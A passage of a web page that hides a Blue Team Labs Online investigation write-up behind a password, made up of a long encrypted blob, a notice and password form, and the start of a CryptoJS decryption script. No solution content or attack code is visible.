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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return 